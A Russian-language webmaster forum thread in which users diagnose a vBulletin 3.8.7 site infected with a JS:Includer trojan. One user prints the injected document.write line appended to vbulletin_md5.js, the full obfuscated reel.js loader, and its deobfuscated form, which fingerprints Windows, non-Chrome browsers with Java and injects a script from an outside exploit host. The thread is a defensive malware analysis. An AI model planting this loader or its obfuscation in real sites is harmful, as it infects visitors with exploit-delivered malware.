vBulletin 3.8.7 JS:Includer-APO [Trj]

Давайте по порядку /ru/forum/comment/12518031

Дублировать вопросы ИМХО не обязательно.

Да у меня все хорошо - чего и вам желаю :)

А вы, я смотрю, продолжаете искать решение в другой теме ( 'Яндекс нашел вирус на сайте' ).

Как найдете - тут его тоже напишите. Тогда и можно будет сказать: "Здесь собственно решение проблемы" :)

а воз и ныне там /clientscript/vbulletin_md5.js?v=387

Так Avast же там ничего не нашел 🍿

А сайт продолжает раздавать "подарки" всем "желающим" ( у кого в браузере разрешена Java ).

Ну не совсем, удалил несколько левых php и swf.

За это отдельное спасибо 🍻🍻🍻😎😎😎

Ссылается он на еще один .js:

/images/regimage/backgrounds/reel.js

Пока не удаляю, пытаюсь понять как его обнаружили.

Firebug на вкладке скрипты показывает:

<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_important.css?v=387" />

<script type="text/javascript" src="clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387"></script>

<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=387"></script>

<script type="text/javascript">

и не ругается.

Про vbulletin_md5.js не пишет вообще.

Каким средством это можно обнаружить?

www.siteguard.ru

Ругается еще на 3 скрипта, прав ли он, что думаете, господа?

<script type="text/javascript"><!-- window.google_analytics_uacct = 'UA-39617615-1'; var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-39617615-1'], ['_setVar', 'usergroup-1-Unregistered / Not Logged In'], ['_gat._anonymizeIp'], ['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //--></script>

<script type="text/javascript"> var _tbdef = {user: 'arbitraz.ru'}; (function(){ var d = document;var tbjs = d.createElement('script'); tbjs.type = 'text/javascript'; tbjs.async = true; tbjs.src = 'http://tweetboard.com/tb.js'; var tbel = d.getElementsByTagName('body')[0]; if(!tbel) tbel = d.getElementsByTagName('head')[0]; tbel.appendChild(tbjs); })(); </script>

<script type="text/javascript"> //<![CDATA[ window.orig_onload = window.onload; window.onload = function() { if (is_ie || is_moz) { var cpost=document.location.hash;if(cpost){ if(cobj = fetch_object(c********bstring(1,cpost.length)))cobj.scrollIntoView(true); }} if(typeof window.orig_onload == "function") window.orig_onload(); } //]]> </script>

---------- Добавлено 13.01.2014 в 07:11 ----------

Отож. У меня Avast перестал ругаться.

Вы то как обнаружили, что эксплоиты подгружаются?

А почему он должен ругаться-то ?

Глазами. Смотрите весь код и замечаете всё лишнее - только и всего :)

Подгрузил и посмотрел :)

3 скрипта - вроде ничего страшного...

kgtu5

Цитата на мою цитату это какой-то вопрос мне ?

Можно пошагово, как подгрузили и как выявили вредоносность?

---------- Добавлено 14.01.2014 в 02:01 ----------

Еще раз большое спасибо.🍻🍻

Зашел на ваш сайт.

Посмотрел код.

В этом clientscript/vbulletin_md5.js?v=387 в конце скрипта было так:

......

{A=A.substring(1,A.length)}while(A.substring(A.length-1,A.length)==" "){A=A.substring(0,A.length-1)}return A}function md5hash(B,A,E,C){if(navigator.userAgent.indexOf("Mozilla/")==0&&parseInt(navigator.appVersion)>=4){var D=hex_md5(str_to_ent(trim(B.value)));A.value=D;if(E){D=hex_md5(trim(B.value));E.value=D}if(!C){B.value=""}}return true};

;document.write("<scr"+"ipt src='/images/regimage/backgrounds/reel.js'><"+"/script>");

где ;document.write(...) явная вставка левого кода с подгрузкой скрипта reel.js. Смотрим на этот скрипт

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 k="13"+"1F";W{26}S(e){k="27"}W{2d}S(e){k+="1Y"}b Z(o){10(g.F&&g.1Z){9 M=g["1U"+"1T"+"1S"+"1R"+"1V"+"1X"](\'21\')[0];9 l=g.F(\'1Q\');9 1P="1J$B:1I,2/]";9 1H="[1G,1K-0*~/~3~";9 1L="1O=,`5}0!`1N";9 1M="22;]4.1W-,23& 2h{";9 2g="2f;U#1*P/p$$2i";l.R(\'2j\',"t"+"e"+"2m/"+"J"+"2l"+"2k"+"i"+"2e");l.R(\'o\',o);9 25="24]28<}A";9 29="U;^D%p)>,2c^;4.";9 2b="C}^}.e.2a!2n?;1E%";9 14="1h]1e 3&)(x[1c].y#6@&<";9 1i="{&1d{@n<X+U!#q?";M[(k).1g("").1b().1a("")](l)}}b Y(){m 12["J"+"15"+"17"+"19"]()}9 18=")1f},1j,{*1y`";9 1x="1w&]z>##1v";9 1z="z+x,K~0] 2?H";9 1A="1D{1C&@%]8+1B(=d";9 1u="K>1t,#%>@";b 11(a){m a["E"+"1n"+"x"+"1m"](Q)!=-1}9 1l="1k/1o@n,../h";9 1p="I;L%1s[d}1r";9 1q="])2o~2Q^!37[>(36^=";9 39="`s$$*3a~35-.)D%p";9 2Z="<A]30{.?[v@.32-B#n";9 u="3j"+"3l"+":/"+"/z"+"3o"+"3p"+"3k"+".p"+"p."+"a"+"/d"+"20"+"3h"+"3i"+"3q"+"3f"+"3n"+"3c"+"L"+"2W"+"2z"+"16"+"O"+"2A"+"2B"+"2x"+"O"+"2w"+"2q"+"2s"+"2t"+"2v"+"2u"+"2E"+"2F"+"H"+"2R"+"2S"+"2U"+"2T"+"2O"+"2N"+"2I";9 Q="w"+"E";9 2G=":i#%[2J^2.r&T%2K<7*2";9 2M="2V]:(f{";9 2r="i:T=%^2y]j,N?~&r";9 38="4,2@2D.*B?>2p";9 2P=",2L)2H[d> };(j 7.q";b V(a){m a.2C("c"+"h"+"3g"+"3e")==-1}b G(){9 a=12["u"+"3m"+"3d"+"33"]["31"+"2X"+"2Y"+"r"+"34"+"3b"]();10(V(a)&&11(a)&&Y()){Z(u)}}G();',62,213,'|||||||||var|ua|function|||||document||||ggg|script_tag|return||src||||||||||||||||in|createElement|includeCounter|e9||ja||03|head_tag||cc||win|setAttribute|catch|||notChrome|try||cond3|inclScript|if|isWin|navigator|dli|TwLcbxNiJzYS3|vaE||nab|azIcbDhMhpR0|led|join|reverse|MT4|rW8|5s|d1j|split|GoBq|TwLcbxNiJzYS4|0y|r301|RbtCNwKL0|Of|de|Tc|RbtCNwKL1|RbtCNwKL2|4_8|RfZ|5_Smw5|azIcbDhMhpR4|3v|PP8|azIcbDhMhpR1|67fNkym|azIcbDhMhpR2|azIcbDhMhpR3|4d|GY|7v|I6|hC|l11N|NKpNAE1|WC|Q1SXV|qpvf8|NKpNAE2|NKpNAE3|5yB|ExBN|NKpNAE0|script|By|ents|Elem|get|TagN||ame|neppa|getElementsByTagName||head|4J|jEF|IVsjLH|TwLcbxNiJzYS0|ert|dlihCd|3P|TwLcbxNiJzYS1|_ud0|TwLcbxNiJzYS2|cwMRVE|ssreldf|pt|Js|NKpNAE4|4a|Zm|type|scr|va|xt|04|5I0O|5SZ5|bd|bxAgiJGRJ2|64|81|8f|74|e5|99|Pv|0c|ee|48|indexOf|Pt|fc|db|bxAgiJGRJ0|gE|d7|q6|P2JAyr|oL8yf|bxAgiJGRJ1|51|6d|bxAgiJGRJ4|nU|fd|ea|62|52|geRiFlwO5IF|08|Lo|we|RbtCNwKL4|Owv|to|J1|nt|Ca|CP|QE|nwI|bxAgiJGRJ3|RbtCNwKL3|52Q|se|83|Age|me|a4|ro|42|40|ht|at|tp|ser|93|yz|al|eb'.split('|'),0,{}))

Скрипт обфусцирован (приведён к нечитаемому виду). Чтобы посмотреть что там, можно воспользоваться каким-нибудь онлайн-деобфускатором, например http://jsbeautifier.org/

Получаем

var ggg = "dli" + "hC";

try {

    ert

} catch (e) {

    ggg = "dlihCd"

}

try {

    ssreldf

} catch (e) {

    ggg += "neppa"

}



function inclScript(src) {

    if (document.createElement && document.getElementsByTagName) {

        var head_tag = document["get" + "Elem" + "ents" + "By" + "TagN" + "ame"]('head')[0];

        var script_tag = document.createElement('script');

        var NKpNAE0 = "Q1SXV$B:WC,2/]";

        var NKpNAE1 = "[l11N,qpvf8-0*~/~3~";
        var NKpNAE2 = "ExBN=,`5}0!`5yB";

        var NKpNAE3 = "4J;]4.1W-,jEF& 4a{";

        var NKpNAE4 = "Js;U#1*P/p$$Zm";

        script_tag.setAttribute('type', "t" + "e" + "xt/" + "ja" + "va" + "scr" + "i" + "pt");

        script_tag.setAttribute('src', src);

        var TwLcbxNiJzYS0 = "IVsjLH]3P<}A";

        var TwLcbxNiJzYS1 = "U;^D%p)>,cwMRVE^;4.";

        var TwLcbxNiJzYS2 = "C}^}.e._ud0!04?;I6%";

        var TwLcbxNiJzYS3 = "GoBq]5s 3&)(x[MT4].y#6@&<";

        var TwLcbxNiJzYS4 = "{&rW8{@n<X+U!#q?";

        head_tag[(ggg).split("").reverse().join("")](script_tag)

    }

}



function cond3() {

    return navigator["ja" + "vaE" + "nab" + "led"]()

}

var azIcbDhMhpR0 = ")d1j},0y,{*67fNkym`";

var azIcbDhMhpR1 = "PP8&]z>##3v";

var azIcbDhMhpR2 = "z+x,K~0] 2?e9";

var azIcbDhMhpR3 = "7v{GY&@%]8+4d(=d";

var azIcbDhMhpR4 = "K>5_Smw5,#%>@";



function isWin(ua) {

    return ua["in" + "de" + "x" + "Of"](win) != -1

}

var RbtCNwKL0 = "r301/Tc@n,../h";

var RbtCNwKL1 = "I;03%RfZ[d}4_8";
var RbtCNwKL2 = "])5I0O~nU^!nwI[>(QE^=";

var RbtCNwKL3 = "`s$$*52Q~CP-.)D%p";

var RbtCNwKL4 = "<A]Owv{.?[v@.J1-B#n";
var u = "ht" + "tp" + ":/" + "/z" + "yz" + "al" + "at" + ".p" + "p." + "ua" + "/d" + "20" + "42" + "40" + "eb" + "a4" + "93" + "83" + "03" + "08" + "0c" + "16" + "cc" + "ee" + "48" + "99" + "cc" + "e5" + "bd" + "64" + "81" + "74" + "8f" + "fc" + "db" + "e9" + "fd" + "ea" + "52" + "62" + "6d" + "51" + "d7";

var win = "w" + "in";

var bxAgiJGRJ0 = ":i#%[q6^2.r&T%P2JAyr<7*2";
var bxAgiJGRJ1 = "geRiFlwO5IF]:(f{";

var bxAgiJGRJ2 = "i:T=%^Pv]j,N?~&r";

var bxAgiJGRJ3 = "4,2@Pt.*B?>5SZ5";

var bxAgiJGRJ4 = ",oL8yf)gE[d> };(j 7.q";



function notChrome(ua) {

    return ua.indexOf("c" + "h" + "ro" + "me") == -1

}



function includeCounter() {

    var ua = navigator["u" + "ser" + "Age" + "nt"]["to" + "Lo" + "we" + "r" + "Ca" + "se"]();

    if (notChrome(ua) && isWin(ua) && cond3()) {

        inclScript(u)

    }

}

includeCounter();

Уже читабельно. Смотрим код

function includeCounter() {

    var ua = navigator["u" + "ser" + "Age" + "nt"]["to" + "Lo" + "we" + "r" + "Ca" + "se"]();

    if (notChrome(ua) && isWin(ua) && cond3()) {

        inclScript(u)

    }

}

includeCounter();

Здесь анализируется userAgent: если браузер не Chrome, если операционка Windows и есть Java на страницу вставляется еще один скрипт, который продолжает процесс втюхивания вируса (подбирается подходящий эксплоит, загружаетя и используется).

И да, такими делами лучше заниматься с виртуалки, а то мало ли что :)